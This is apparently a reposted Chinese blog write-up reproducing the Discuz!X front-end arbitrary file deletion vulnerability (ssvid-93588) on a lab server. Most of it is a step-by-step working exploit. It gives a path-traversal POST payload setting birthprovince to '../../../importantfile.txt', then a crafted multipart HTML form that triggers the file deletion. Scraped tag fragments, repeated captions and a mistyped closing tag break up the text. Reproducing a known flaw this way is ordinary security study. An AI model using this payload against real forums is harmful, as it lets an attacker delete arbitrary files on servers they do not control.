Discuz!X前臺任意文件刪除漏洞重現

漏洞背景:
Discuz!X社區軟件,是一個採用 PHP 和 MySQL 等其餘多種數據庫構建的性能優異、功能全面、安全穩定的社區論壇平臺。php

2017年9月29日,Discuz!修復了一個安全問題用於增強安全性,這個漏洞會致使前臺用戶能夠致使任意刪除文件漏洞。html

2017年9月29日,知道創宇404 實驗室開始應急,通過知道創宇404實驗室分析確認,該漏洞於2014年6月被提交到 Wooyun漏洞平臺,Seebug漏洞平臺收錄了該漏洞,漏洞編號 ssvid-93588。該漏洞經過配置屬性值,致使任意文件刪除。數據庫

通過分析確認,原有的利用方式已經被修復,添加了對屬性的 formtype 判斷,但修復方式不徹底致使能夠繞過,經過模擬文件上傳能夠進入其餘 unlink 條件,實現任意文件刪除漏洞。安全

漏洞復現:
1.進入設置-我的資料,先在頁面源代碼找到formhash值,能夠看到值爲2599b5e5
Discuz!X前臺任意文件刪除漏洞重現
2.開啓一個插件Hackbar
Post數據:birthprovince=../../../importantfile.txt&profilesubmit=1&formhash=2599b5e5
Discuz!X前臺任意文件刪除漏洞重現
執行後會顯示一片空白,你再刷新下或從新訪問下就行了。
Discuz!X前臺任意文件刪除漏洞重現
Discuz!X前臺任意文件刪除漏洞重現
3.出生地被修改爲要刪除的文件。
最後構造表單執行刪除文件
<form
action="http://192.168.199.217/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="720c16c3"/></p>
<input type="text" name="profilesubmit" value="1"/></p>
<input type="submit" value="Submit" />
</from>
Discuz!X前臺任意文件刪除漏洞重現
生成.html,上面的須要本身修改。
4.而後隨便上傳一張圖片,就能刪除本身要刪除的。
Discuz!X前臺任意文件刪除漏洞重現
5.再訪問回去看一下。
Discuz!X前臺任意文件刪除漏洞重現
復現成功。ide

相關文章
相關標籤/搜索